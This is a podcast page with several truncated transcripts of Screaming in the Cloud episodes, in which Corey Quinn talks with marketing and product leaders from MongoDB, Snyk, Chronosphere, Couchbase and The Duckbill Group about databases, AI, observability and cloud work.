Claim Ownership


Subscribed: 0Played: 0


Peder Ulander, Chief Marketing & Strategy Officer at MongoDB, joins Corey on Screaming in the Cloud to discuss how MongoDB is paving the way for innovation. Corey and Peder discuss how Peder made the decision to go from working at Amazon to MongoDB, and Peder explains how MongoDB is seeking to differentiate itself by making it easier for developers to innovate without friction. Peder also describes why he feels databases are more ubiquitous than people realize, and what it truly takes to win the hearts and minds of developers. About Peder Peder Ulander, the maestro of marketing mayhem at MongoDB, juggles strategies like a tech wizard on caffeine. As the Chief Marketing & Strategy Officer, he battles buzzwords, slays jargon dragons, and tends to developers with a wink. From pioneering Amazon's cloud heyday as Director of Enterprise and Developer Solutions Marketing to leading the brand behind's insurgency, Peder's built a legacy as the swashbuckler of software, leaving a trail of market disruptions one vibrant outfit at a time. Peder is the Scarlett Johansson of tech marketing — always looking forward, always picking the edgy roles that drive what's next in technology.Links Referenced:MongoDB: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. This promoted guest episode of Screaming in the Cloud is brought to us by my friends and yours at MongoDB, and into my veritable verbal grist mill, they have sent Peder Ulander, their Chief Marketing Officer. Peder, an absolute pleasure to talk to you again.Peder: Always good to see you, Corey. Thanks for having me.Corey: So, once upon a time, you worked in marketing over at AWS, and then you transitioned off to Mongo to, again, work in marketing. Imagine that. Almost like there’s a narrative arc to your career. A lot of things change when you change companies, but before we dive into things, I just want to call out that you’re a bit of an aberration in that every single person that I have spoken to who has worked within your org has nothing but good things to say about you, which means you are incredibly effective at silencing dissent. Good work.Peder: Or it just shows that I’m a good marketer and make sure that we paint the right picture that the world needs to see.Corey: Exactly. “Do you have any proof of you being a great person to work for?” “No, just word of mouth,” and everyone, “Ah, that’s how marketing works.”Peder: Exactly. See, I’m glad you picked up somewhere.Corey: So, let’s dive into that a little bit. Why would you leave AWS to go work at Mongo. Again, my usual snark and sarcasm would come up with a half dozen different answers, each more offensive than the last. Let’s be serious for a second. At AWS, there’s an incredibly powerful engine that drives so much stuff, and the breadth is enormous.MongoDB, despite an increasingly broad catalog of offerings, is nowhere near that level of just universal applicability. Your product strategy is not a Post-It note with the word ‘yes’ written on it. There are things that you do across the board, but they all revolve around databases.Peder: Yeah. So, going back prior to MongoDB, I think you know, at AWS, I was across a number of different things, from the developer ecosystem, to the enterprise transformation, to the open-source work, et cetera, et cetera. And being privy to how customers were adopting technology to change their business or change the experiences that they were delivering to their customers or increase the value of the applications that they built, you know, there was a common thread of something that fundamentally needed to change. And I like to go back to just the evolution of tech in that sense. We could talk about going from physical on-prem systems to now we’re distributed in the cloud. You could talk about application constructs that started as big fat monolithic apps that moved to virtual, then microservices, and now functions.Or you think about networking, we’ve gone from fixed wire line, to network edge, and cellular, and what have you. All of the tech stack has changed with the exception of one layer, and that’s the data layer. And I think for the last 20 years, what’s been in place has worked okay, but we’re now meeting this new level of scale, this new level of reach, where the old systems are not what’s going to be what the new systems are built on, or the new experiences are built on. And as I was approached by MongoDB, I kind of sat back and said, “You know, I’m super happy at AWS. I love the learning, I love the people, I love the space I was in, but if I were to put my crystal ball together”—here’s a Bezos statement of looking around corners—“The data space is probably one of the biggest spaces ripe for disruption and opportunity, and I think Mongo is in an incredible position to go take advantage of that.”Corey: I mean, there’s an easy number of jokes to make about AmazonBasics MongoDB, which is my disparaging name for their DocumentDB first-party offering. And for a time, it really felt like AWS’s perspective toward its partners was one of outright hostility, if not antagonism. But that narrative no longer holds true in 2023. There’s been a definite shift. And to be direct, part of the reason that I believe that is the things you have said both personally and professionally in your role as CMO of Mongo that has caused me to reevaluate this because despite all of your faults—a counted list of which I can provide you after the show—Peder: [laugh].Corey: You do not say things that you do not believe to be true.Peder: Correct.Corey: So, something has changed. What is it?Peder: So, I think there’s an element of coopetition, right? So, I would go as far as to say the media loved to sensationalize—actually even the venture community—loved to sensationalize the screen scraping stripping of open-source communities that Amazon represented a number of years ago. The reality was their intent was pretty simple. They built an incredibly amazing IT stack, and they wanted to run whatever applications and software were important to their customers. And when you think about that, the majority of systems today, people want to run open-source because it removes friction, it removes cost, it enables them to go do cool new things, and be on the bleeding edge of technology.And Amazon did their best to work with the top open-source projects in the world to make it available to their customers. Now, for the commercial vendors that are leaning into this space, that obviously does present itself threat, right? And we’ve seen that along a number of the cohorts of whether you want to call it single-vendor open-source or companies that have a heavy, vested interest in seeing the success of their enterprise stack match the success of the open-source stack. And that’s, I think, where media, analysts, venture, all kind of jumped on the bandwagon of not really, kind of, painting that bigger picture for the future. I think today when I look at Amazon—and candidly, it’ll be any of the hyperscalers; they all have a clone of our database—it’s an entry point. They’re running just the raw open-source operational database capabilities that we have in our community edition and making that available to customers.We believe there’s a bigger value in going beyond just that database and introducing, you know, anything from the distributed zones to what we do around vector search to what we do around stream processing, and encryption and all of these advanced features and capabilities that enable our customers to scale rapidly on our platform. And the dependency on delivering that is with the hyperscalers, so that’s where that coopetition comes in, and that becomes really important for us when we’re casting our web to engage with some of the world’s largest customers out there. But interestingly enough, we become a big drag of services for an AWS or any of the other hyperscalers out there, meaning that for every dollar that goes to a MongoDB, there’s, you know, three, five, ten dollars that goes to these hyperscalers. And so, they’re very active in working with us to ensure that, you know, we have fair and competing offers in the marketplace, that they’re promoting us through their own marketplace as well as their own channels, and that we’re working together to further the success of our customers.Corey: When you take a look at the exciting things that are happening at the data layer—because you mentioned that we haven’t really seen significant innovation in that space for a while—one of the things that I see happening is with the rise of Generative AI, which requires very special math that can only be handled by very special types of computers. I’m seeing at least a temporary inversion in what has traditionally been thought of as data gravity, whereas it’s easier to move compute close to the data, but in this case, since the compute only lives in the, um, sparkling us-east-1 regions of Virginia, otherwise, it’s just generic, sparkling expensive computers, great, you have to effectively move the mountain to Mohammed, so to speak. So, in that context, what else is happening that is driving innovation in the data space right now?Peder: Yeah, yeah. I love your analogy of, move the mountain of Mohammed because that’s actually how we look at the opportunity in the whole Generative AI movement. There are a lot of tools and capabilities out there, whether we’re looking at code generation tools, LLM modeling vendors, some of the other vector database companies that are out there, and they’re all built on the premise of
Randall Degges, Head of Developer Relations & Community at Snyk, joins Corey on Screaming in the Cloud to discuss Snyk’s innovative AI strategy and why developers don’t need to be afraid of security. Randall explains the difference between Large Language Models and Symbolic AI, and how combining those two approaches creates more accurate security tooling. Corey and Randall also discuss the FUD phenomenon to selling security tools, and Randall expands on why Snyk doesn’t take that approach. Randall also shares some background on how he went from being a happy Snyk user to a full-time Snyk employee. About RandallRandall runs Developer Relations & Community at Snyk, where he works on security research, development, and education. In his spare time, Randall writes articles and gives talks advocating for security best practices. Randall also builds and contributes to various open-source security tools.Randall's realms of expertise include Python, JavaScript, and Go development, web security, cryptography, and infrastructure security. Randall has been writing software for over 20 years and has built a number of popular API services and open-source tools.Links Referenced: Snyk: Snyk blog: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud, I’m Corey Quinn, and this featured guest episode is brought to us by our friends at Snyk. Also brought to us by our friends at Snyk is one of our friends at Snyk, specifically Randall Degges, their Head of Developer Relations and Community. Randall, thank you for joining me.Randall: Hey, what’s up, Corey? Yeah, thanks for having me on the show, man. Looking forward to talking about some fun security stuff today.Corey: It’s been a while since I got to really talk about a security-centric thing on this show, at least in order of recordings. I don’t know if the one right before this is a security thing; things happen on the back-end that I’m blissfully unaware of. But it seems the theme lately has been a lot around generative AI, so I’m going to start off by basically putting you in the hot seat. Because when you pull up a company’s website these days, the odds are terrific that they’re going to have completely repositioned absolutely everything that they do in the context of generative AI. It’s like, “We’re a generative AI company.” It’s like, “That’s great.” Historically, I have been a paying customer of Snyk so that it does security stuff, so if you’re now a generative AI company, who do I use for the security platform thing that I was depending upon? You have not done that. First, good work. Secondly, why haven’t you done that?Randall: Great question. Also, you said a moment ago that LLMs are very interesting, or there’s a lot of hype around it. Understatement of the last year, for sure [laugh].Corey: Oh, my God, it has gotten brutal.Randall: I don’t know how many billions of dollars have been dumped into LLM in the last 12 months, but I’m sure it’s a very high number.Corey: I have a sneaking suspicion that the largest models cost at least a billion each train, just based upon—at least retail price—based upon the simple economics of how long it takes to do these things, how expensive that particular flavor of compute is. And the technology is his magic. It is magic in a box and I see that, but finding ways that it applies in different ways is taking some time. But that’s not stopping the hype beasts. A lot of the same terrible people who were relentlessly pushing crypto have now pivoted to relentlessly pushing generative AI, presumably because they’re working through Nvidia’s street team, or their referral program, or whatever it is. Doesn’t matter what the rest of us do, as long as we’re burning GPU cycles on it. And I want to distance myself from that exciting level of boosterism. But it’s also magic.Randall: Yeah [laugh]. Well, let’s just talk about AI insecurity for a moment and answer your previous question. So, what’s happening in space, what’s the deal, what is all the hype going to, and what is Snyk doing around there? So, quite frankly—and I’m sure a lot of people on your show say the same thing—but Snyk isn’t new into, like, the AI space. It’s been a fundamental part of our platform for many years now.So, for those of you listening who have no idea what the heck Snyk is, and you’re like, “Why are we talking about this,” Snyk is essentially a developer security company, and the core of what we do is two things. The first thing is we help scan your code, your dependencies, your containers, all the different parts of your application, and detect vulnerabilities. That’s the first part. The second thing we do is we help fix those vulnerabilities. So, detection and remediation. Those are the two components of any good security tool or security company.And in our particular case, we’re very focused on developers because our whole product is really based on your application and your application security, not infrastructure and other things like this. So, with that being said, what are we doing at a high level with LLMs? Well, if you think about AI as, like, a broad spectrum, you have a lot of different technologies behind the scenes that people refer to as AI. You have lots of these large language models, which are generating text based on inputs. You also have symbolic AI, which has been around for a very long time and which is very domain specific. It’s like creating specific rules and helping do pattern detection amongst things.And those two different types of applied AI, let’s say—we have large language models and symbolic AI—are the two main things that have been happening in industry for the last, you know, tens of years, really, with LLM as being the new kid on the block. So, when we’re talking about security, what’s important to know about just those two underlying technologies? Well, the first thing is that large language models, as I’m sure everyone listening to this knows, are really good at predicting things based on a big training set of data. That’s why companies like OpenAI and their ChatGPT tool have become so popular because they’ve gone out and crawled vast portions of the internet, downloaded tons of data, classified it, and then trained their models on top of this data so that they can help predict the things that people are putting into chat. And that’s why they’re so interesting, and powerful, and there’s all these cool use cases popping up with them.However, the downside of LLMs is because they’re just using a bunch of training data behind the scenes, there’s a ton of room for things to be wrong. Training datasets aren’t perfect, they’re coming from a ton of places, and even if they weren’t perfect, there’s still the likelihood that things that are going to be generating output based on a statistical model isn’t going to be accurate, which is the whole concept of hallucinations.Corey: Right. I wound up remarking on the livestream for GitHub Universe a week or two ago that the S in AI stood for security. One of the problems I’ve seen with it is that it can generate a very plausible looking IAM policy if you ask it to, but it doesn’t actually do what you think it would if you go ahead and actually use it. I think that it’s still squarely in the realm of, it’s great at creativity, it’s great at surface level knowledge, but for anything important, you really want someone who knows what they’re doing to take a look at it and say, “Slow your roll there, Hasty Pudding.”Randall: A hundred percent. And when we’re talking about LLMs, I mean, you’re right. Security isn’t really what they’re designed to do, first of all [laugh]. Like, they’re designed to predict things based on statistics, which is not a security concept. But secondly, another important thing to note is, when you’re talking about using LLMs in general, there’s so many tricks and techniques and things you can do to improve accuracy and improve things, like for example, having a ton of [contexts 00:06:35] or doing Few-Shot Learning Techniques where you prompt it and give it examples of questions and answers that you’re looking for can give you a slight competitive edge there in terms of reducing hallucinations and false information.But fundamentally, LLMs will always have a problem with hallucinations and getting things wrong. So, that brings us to what we mentioned before: symbolic AI and what the differences are there. Well, symbolic AI is a completely different approach. You’re not taking huge training sets and using machine learning to build statistical models. It’s very different. You’re creating rules, and you’re parsing very specific domain information to generate things that are highly accurate, although those models will fail when applied to general-purpose things, unlike large language models.So, what does that mean? You have these two different types of AI that people are using. You have symbolic AI, which is very specific and requires a lot of expertise to create, then you have LLMs, which take a lot of experience to create as well, but are very broad and general purpose and have a capability to be wrong. Snyk’s approach is, we take both of those concepts, and we use them together to get the best of both worlds. And we can talk a little bit about that, but I think fundamentally, one of the things that separates Snyk from a lot of other companies in the space is we’re just trying to do whatever the best technical solution is to solve the problem, and I think we found that with our hybrid approach.Corey: I think that there is a reasonable distrust of AI when it comes to security. I
Rachel Dines, Head of Product and Technical Marketing at Chronosphere, joins Corey on Screaming in the Cloud to discuss why creating a cloud-native observability strategy is so critical, and the challenges that come with both defining and accomplishing that strategy to fit your current and future observability needs. Rachel explains how Chronosphere is taking an open-source approach to observability, and why it’s more important than ever to acknowledge that the stakes and costs are much higher when it comes to observability in the cloud. About RachelRachel leads product and technical marketing for Chronosphere. Previously, Rachel wore lots of marketing hats at CloudHealth (acquired by VMware), and before that, she led product marketing for cloud-integrated storage at NetApp. She also spent many years as an analyst at Forrester Research. Outside of work, Rachel tries to keep up with her young son and hyper-active dog, and when she has time, enjoys crafting and eating out at local restaurants in Boston where she’s based.Links Referenced: Chronosphere: LinkedIn: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. Today’s featured guest episode is brought to us by our friends at Chronosphere, and they have also brought us Rachel Dines, their Head of Product and Solutions Marketing. Rachel, great to talk to you again.Rachel: Hi, Corey. Yeah, great to talk to you, too.Corey: Watching your trajectory has been really interesting, just because starting off, when we first started, I guess, learning who each other were, you were working at CloudHealth which has since become VMware. And I was trying to figure out, huh, the cloud runs on money. How about that? It feels like it was a thousand years ago, but neither one of us is quite that old.Rachel: It does feel like several lifetimes ago. You were just this snarky guy with a few followers on Twitter, and I was trying to figure out what you were doing mucking around with my customers [laugh]. Then [laugh] we kind of both figured out what we’re doing, right?Corey: So, speaking of that iterative process, today, you are at Chronosphere, which is an observability company. We would have called it a monitoring company five years ago, but now that’s become an insult after the observability war dust has settled. So, I want to talk to you about something that I’ve been kicking around for a while because I feel like there’s a gap somewhere. Let’s say that I build a crappy web app—because all of my web apps inherently are crappy—and it makes money through some mystical form of alchemy. And I have a bunch of users, and I eventually realize, huh, I should probably have a better observability story than waiting for the phone to ring and a customer telling me it’s broken.So, I start instrumenting various aspects of it that seem to make sense. Maybe I go too low level, like looking at all the discs on every server to tell me if they’re getting full or not, like their ancient servers. Maybe I just have a Pingdom equivalent of is the website up enough to respond to a packet? And as I wind up experiencing different failure modes and getting yelled at by different constituencies—in my own career trajectory, my own boss—you start instrumenting for all those different kinds of breakages, you start aggregating the logs somewhere and the volume gets bigger and bigger with time. But it feels like it’s sort of a reactive process as you stumble through that entire environment.And I know it’s not just me because I’ve seen this unfold in similar ways in a bunch of different companies. It feels to me, very strongly, like it is something that happens to you, rather than something you set about from day one with a strategy in mind. What’s your take on an effective way to think about strategy when it comes to observability?Rachel: You just nailed it. That’s exactly the kind of progression that we so often see. And that’s what I really was excited to talk with you about today—Corey: Oh, thank God. I was worried for a minute there that you’d be like, “What the hell are you talking about? Are you just, like, some sort of crap engineer?” And, “Yes, but it’s mean of you to say it.” But yeah, what I’m trying to figure out is there some magic that I just was never connecting? Because it always feels like you’re in trouble because the site’s always broken, and oh, like, if the disk fills up, yeah, oh, now we’re going to start monitoring to make sure the disk doesn’t fill up. Then you wind up getting barraged with alerts, and no one wins, and it’s an uncomfortable period of time.Rachel: Uncomfortable period of time. That is one very polite way to put it. I mean, I will say, it is very rare to find a company that actually sits down and thinks, “This is our observability strategy. This is what we want to get out of observability.” Like, you can think about a strategy and, like, the old school sense, and you know, as an industry analyst, so I’m going to have to go back to, like, my roots at Forrester with thinking about, like, the people, and the process, and the technology.But really what the bigger component here is like, what’s the business impact? What do you want to get out of your observability platform? What are you trying to achieve? And a lot of the time, people have thought, “Oh, observability strategy. Great, I’m just going to buy a tool. That’s it. Like, that’s my strategy.”And I hate to bring it to you, but buying tools is not a strategy. I’m not going to say, like, buy this tool. I’m not even going to say, “Buy Chronosphere.” That’s not a strategy. Well, you should buy Chronosphere. But that’s not a strategy.Corey: Of course. I’m going to throw the money by the wheelbarrow at various observability vendors, and hope it solves my problem. But if that solved the problem—I’ve got to be direct—I’ve never spoken to those customers.Rachel: Exactly. I mean, that’s why this space is such a great one to come in and be very disruptive in. And I think, back in the days when we were running in data centers, maybe even before virtual machines, you could probably get away with not having a monitoring strategy—I’m not going to call it observability; it’s not we call the back then—you could get away with not having a strategy because what was the worst that was going to happen, right? It wasn’t like there was a finite amount that your monitoring bill could be, there was a finite amount that your customer impact could be. Like, you’re paying the penny slots, right?We’re not on the penny slots anymore. We’re in the $50 craps table, and it’s Las Vegas, and if you lose the game, you’re going to have to run down the street without your shirt. Like, the game and the stakes have changed, and we’re still pretending like we’re playing penny slots, and we’re not anymore.Corey: That’s a good way of framing it. I mean, I still remember some of my biggest observability challenges were building highly available rsyslog clusters so that you could bounce a member and not lose any log data because some of that was transactionally important. And we’ve gone beyond that to a stupendous degree, but it still feels like you don’t wind up building this into the application from day one. More’s the pity because if you did, and did that intelligently, that opens up a whole world of possibilities. I dream of that changing where one day, whenever you start to build an app, oh, and we just push the button and automatically instrument with OTel, so you instrument the thing once everywhere it makes sense to do it, and then you can do your vendor selection and what you said were decisions later in time. But these days, we’re not there.Rachel: Well, I mean, and there’s also the question of just the legacy environment and the tech debt. Even if you wanted to, the—actually I was having a beer yesterday with a friend who’s a VP of Engineering, and he’s got his new environment that they’re building with observability instrumented from the start. How beautiful. They’ve got OTel, they’re going to have tracing. And then he’s got his legacy environment, which is a hot mess.So, you know, there’s always going to be this bridge of the old and the new. But this was where it comes back to no matter where you’re at, you can stop and think, like, “What are we doing and why?” What is the cost of this? And not just cost in dollars, which I know you and I could talk about very deeply for a long period of time, but like, the opportunity costs. Developers are working on stuff that they could be working on something that’s more valuable.Or like the cost of making people work round the clock, trying to troubleshoot issues when there could be an easier way. So, I think it’s like stepping back and thinking about cost in terms of dollar sense, time, opportunity, and then also impact, and starting to make some decisions about what you’re going to do in the future that’s different. Once again, you might be stuck with some legacy stuff that you can’t really change that much, but [laugh] you got to be realistic about where you’re at.Corey: I think that that is a… it’s a hard lesson to be very direct, in that, companies need to learn it the hard way, for better or worse. Honestly, this is one of the things that I always noticed in startup land, where you had a whole bunch of, frankly, relatively early-career engineers in their early-20s, if not younger. But then the ops person was always significantly older because the thing you actually want to hear from your ops person, regardless of how you slice it, is, “Oh, yeah, I’ve seen thi
Jeff Morris, VP of Product & Solutions Marketing at Couchbase, joins Corey on Screaming in the Cloud to discuss Couchbase’s new columnar data store functionality, specific use cases for columnar data stores, and why AI gets better when it communicates with a cleaner pool of data. Jeff shares how more responsive databases could allow businesses like Dominos and United Airlines to create hyper-personalized experiences for their customers by utilizing more responsive databases. Jeff dives into the linked future of AI and data, and Corey learns about Couchbase’s plans for the re:Invent conference. If you’re attending re:Invent, you can visit Couchbase at booth 1095.About JeffJeff Morris is VP Product & Solutions Marketing at Couchbase (NASDAQ: BASE), a cloud database platform company that 30% of the Fortune 100 depend on.Links Referenced:Couchbase: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. This promoted guest episode of Screaming in the Cloud is brought to us by our friends at Couchbase. Also brought to us by Couchbase is today’s victim, for lack of a better term. Jeff Morris is their VP of Product and Solutions Marketing. Jeff, thank you for joining me.Jeff: Thanks for having me, Corey, even though I guess I paid for it.Corey: Exactly. It’s always great to say thank you when people give you things. I learned this from a very early age, and the only people who didn’t were rude children and turned into worse adults.Jeff: Exactly.Corey: So, you are effectively announcing something new today, and I always get worried when a database company says that because sometimes it’s a license that is going to upset people, sometimes it’s dyed so deep in the wool of generative AI that, “Oh, we’re now supporting vectors or whatnot.” Well, most of us don’t know what that means.Jeff: Right.Corey: Fortunately, I don’t believe that’s what you’re doing today. What have you got for us?Jeff: So, you’re right. It’s—well, what I’m doing is, we’re announcing new stuff inside of Couchbase and helping Couchbase expand its market footprint, but we’re not really moving away from our sweet spot, either, right? We like building—or being the database platform underneath applications. So, push us on the operational side of the operational versus analytic, kind of, database divide. But we are announcing a columnar data store inside of the Couchbase platform so that we can build bigger, better, stronger analytic functionality to feed the applications that we’re supporting with our customers.Corey: Now, I feel like I should ask a question around what a columnar data store is because my first encounter with the term was when I had a very early client for AWS bill optimization when I was doing this independently, and I was asking them the… polite question of, “Why do you have 283 billion objects in a single S3 bucket? That is atypical and kind of terrifying.” And their answer was, “Oh, we built our own columnar data store on top of S3. This might not have been the best approach.” It’s like, “I’m going to stop you there. With no further information, I can almost guarantee you that it was not.” But what is a columnar data store?Jeff: Well, let’s start with the, everybody loves more data and everybody loves to count more things, right, but a columnar data store allows you to expedite the kind of question that you ask of the data itself by not having to look at every single row of the data while you go through it. You can say, if you know you’re only looking for data that’s inside of California, you just look at the column value of find me everything in California and then I’ll pick all of those records to analyze. So, it gives you a faster way to go through the data while you’re trying to gather it up and perform aggregations against it.Corey: It seems like it’s one of those, “Well, that doesn’t sound hard,” type of things, when you’re thinking about it the way that I do, in terms of a database being more or less a medium to large size Excel spreadsheet. But I have it on good faith from all the customer environments. I’ve worked with that no, no, there are data stores that span even larger than that, which is, you know, one of those sad realities of the world. And everything at scale begins to be a heck of a lot harder. I’ve seen some of the value that this stuff offers and I can definitely understand a few different workloads in which case that’s going to be super handy. What are you targeting specifically? Or is this one of those areas where you’re going to learn from your customers?Jeff: Well, we’ve had analytic functionality inside the platform. It just, at the size and scale customers actually wanted to roam through the data, we weren’t supporting that that much. So, we’ll expand that particular footprint, it’ll give us better integration capabilities with external systems, or better access to things in your bucket. But the use case problem is, I think, going to be driven by what new modern application requirements are going to be. You’re going to need, we call it hyper-personalization because we tend to cater to B2C-style applications, things with a lot of account profiles built into them.So, you look at account profile, and you’re like, “Oh, well Jeff likes blue, so sell him blue stuff.” And that’s a great current level personalization, but with a new analytic engine against this, you can maybe start aggregating all the inventory information that you might have of all the blue stuff that you want to sell me and do that in real-time, so I’m getting better recommendations, better offers as I’m shopping on your site or looking at my phone and, you know, looking for the next thing I want to buy.Corey: I’m sure there’s massive amounts of work that goes into these hyper-personalization stories. The problem is that the only time they really rise to our notice is when they fail hilariously. Like, you just bought a TV, would you like to buy another? Now statistically, you are likelier to buy a second TV right after you buy one, but for someone who just, “Well, I’m replacing my living room TV after ten years,” it feels ridiculous. Or when you buy a whole bunch of nails and they don’t suggest, “Would you like to also perhaps buy a hammer?”It’s one of those areas where it just seems like a human putting thought into this could make some sense. But I’ve seen some of the stuff that can come out of systems like this and it can be incredible. I also personally tend to bias towards use cases that are less, here’s how to convince you to buy more things and start aiming in a bunch of other different directions where it starts meeting emerging use cases or changing situations rapidly, more rapidly than a human can in some cases. The world has, for better or worse, gotten an awful lot faster over the last few decades.Jeff: Yeah. And think of it in terms of how responsive can I be at any given moment. And so, let’s pick on one of the more recent interesting failures that has popped up. I’m a Giants fan, San Francisco Giants fan, so I’ll pick on the Dodgers. The Dodgers during the baseball playoffs, Clayton Kershaw—three-time MVP, Cy Young Award winner, great, great pitcher—had a first-inning meltdown of colossal magnitude: gave up 11 runs in the first inning to the Diamondbacks.Well, my customer Domino’s Pizza could end up—well, let’s shift the focus of our marketing. We—you know, the Dodgers are the best team in baseball this year in the National League—let’s focus our attention there, but with that meltdown, let’s pivot to Arizona and focus on our market in Phoenix. And they could do that within minutes or seconds, even, with the kinds of capabilities that we’re coming up with here so that they can make better offers to that new environment and also do the decision intelligence behind it. Like, do I have enough dough to make a bigger offer in that big market? Do I have enough drivers or do I have to go and spin out and get one of the other food delivery folks—UberEats, or something like that—to jump on board with me and partner up on this kind of system?It’s that responsiveness in real, real-time, right, that’s always been kind of the conundrum between applications and analytics. You get an analytic insight, but it takes you an hour or a day to incorporate that into what the application is doing. This is intended to make all of that stuff go faster. And of course, when we start to talk about things in AI, right, AI is going to expect real-time responsiveness as best you can make it.Corey: I figure we have to talk about AI. That is a technology that has absolutely sprung to the absolute peak of the hype curve over the past year. OpenAI released Chat-Gippity, either late last year or early this year and suddenly every company seems to be falling all over itself to rebrand itself as an AI company, where, “We’ve been working on this for decades,” they say, right before they announce something that very clearly was crash-developed in six months. And every company is trying to drape themselves in the mantle of AI. And I don’t want to sound like I’m a doubter here. I’m like most fans; I see an awful lot of value here. But I am curious to get your take on what do you think is real and what do you think is not in the current hype environment.Jeff: So yeah, I love that. I think there’s a number of things that are, you know, are real is, it’s not going away. It is going to continue to evolve and get better and better and better. One of my analyst friends came up with the notion that the exercise of generative AI, it’s imprecise, so it gives you similarit
Jeremy Tangren, Director of Media Operations at The Duckbill Group, joins Corey on Screaming in the Cloud to discuss how he went from being a Project Manager in IT to running Media Operations at a cloud costs consultancy. Jeremy provides insight into how his background as a Project Manager has helped him tackle everything that’s necessary in a media production environment, as well as what it was like to shift from a career on the IT side to working at a company that is purely cloud-focused. Corey and Jeremy also discuss the coordination of large events like re:Invent, and what attendance is really like when you’re producing the highlight reels that other people get to watch from the comfort of their own homes. About JeremyWith over 15 years of experience in big tech, Jeremy brings a unique perspective to The Duckbill Group and its Media Team. Jeremy handles all things Media Operations. From organizing the team and projects to making sure publications go out on time, Jeremy does a bit of everything!Links Referenced: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. Today’s guest is one of those behind-the-scenes type of people who generally doesn’t emerge much into the public eye. Now, that’s a weird thing to say about most folks, except in this case, I know for a fact that it’s true because that’s kind of how his job was designed. Jeremy Tangren is the Director of Media Operations here at The Duckbill Group. Jeremy, thank you for letting me drag you into the spotlight.Jeremy: Of course. I’m happy to be here, Corey.Corey: So, you’ve been here, what, it feels like we’re coming up on the two-year mark or pretty close to it. I know that I had you on as a contractor to assist with a re:Invent a couple years back and it went so well, it’s, “How do we get you in here full time? Oh, we can hire you.” And the rest sort of snowballed from there.Jeremy: Yes. January will be two years, in fact.Corey: I think that it’s one of the hardest things to do for you professionally has always been to articulate the value that you bring because I’ve been working with you here for two years and I still do a pretty poor job of doing it, other than to say, once you get brought into a project, all of the weird things that cause a disjoint or friction along the way or cause the wheels to fall off magically go away. But I still struggle to articulate what that is in a context that doesn’t just make it sound like I’m pumping up my buddy, so to speak. How do you define what it is that you do? I mean, now Director of Media Operations is one of those titles that can cover an awful lot of ground, and because of a small company, it obviously does. But how do you frame what you do?Jeremy: Well, I am a professional hat juggler, for starters. There are many moving parts and I come from a history of project management, a long, long history of project management. And I’ve worked with projects from small scale to the large scale spanning globally and I always understand that there are many moving parts that have to be tracked and handled, and there are many people involved in that process. And that’s what I bring here to The Duckbill Group is that experience of managing the small details while also understanding the larger picture.Corey: It’s one of those hard-to-nail-down type of roles. It’s sort of one of those glue positions where, in isolation, it’s well, there’s not a whole lot that gets done when it is just you. I felt the same thing my entire career as a sysadmin turned other things that are basically fancy titles but still distilled down to systems administrator. And that is, well step one, I need a web property or some site or something that is going to absorb significant traffic and have developers building it. Because, “Oh, I’m going to run some servers.” “Okay, for what purpose?” “I don’t know.”I was never good at coming up with the application that rode on top of these things. But give me someone else’s application, I could make it scale and a bunch of exciting ways, back when that was trickier to do at smaller scale. These days, the providers out there make it a heck of a lot easier and all I really wind up doing is—these days—making fun of other people’s hard work. It keeps things simpler, somehow.Jeremy: There always has to be a voice leading that development and understanding what you’re trying to achieve at the end. And that’s what a project manager, or in my role as Director of Media Operations, that’s what I do is I see our vision to the end and I bring in the people and resources necessary to make it happen.Corey: Your background is kind of interesting. You have done a lot of things that a lot of places, mostly large companies, and mostly on the corporate IT side of the world. But to my understanding, this is the first time you’ve really gone into anything approaching significant depth with things that are cloud-oriented. What’s it been like for you?Jeremy: It’s a new experience. As you said, I’ve had experience all over the industry. I come from traditional data centers and networking. I’m originally trained in Cisco networking from way back in the day, and then I moved on into virtual reality development and other infrastructure management. But getting into the cloud has been something new and it’s been a shift from old-school data centers in a way that is complicated to wrap your head around.Whereas in a data center before, it was really clear you had shelves of hardware, you had your racks, you had your disks, you had finite resources, and this is what you did; you built your applications on top of it and that was the end of the conversation. Now, the application is the primary part of the conversation, and scaling is third, fourth, fifth in the conversation. It’s barely even mentioned because obviously we’re going to put this in the cloud and obviously we’re going to scale this out. And that’s a power and capability that I had not seen in past companies, past infrastructures. And so, learning about the cloud, learning about the numerous AWS [laugh] services that exist and how they interact, has been a can of worms to understand and slowly take one worm out at a time and work with it and become its friend.Corey: I was recently reminded of a time before cloud where I got to go hang out with the founders at Oxide over in Oakland. I’d forgotten so much of the painful day-to-day minutia of what it took to get servers up and running in a data center, of the cabling nonsense, of slicing your fingers to ribbons on rack nuts, on waiting weeks on end for the server you ordered to show up, ideally in the right configuration, of getting 12 servers and 11 of them provision correctly and the 12th doesn’t for whatever godforsaken reason. So, much of that had just sort of slipped my mind. And, “Oh, yeah, that’s right. That’s what the whole magic of cloud was.”Conversely, I’ve done a fair bit of IoT stuff at home for the past year or so, just out of basically looking for a hobby, and it feels different, for whatever reason, to be running something that I’m not paying a third party by the hour for. The actual money that we’re talking about in either case is nothing, but there’s a difference psychologically and I’m wondering how much the current cloud story is really shaping the way that an entire generation is 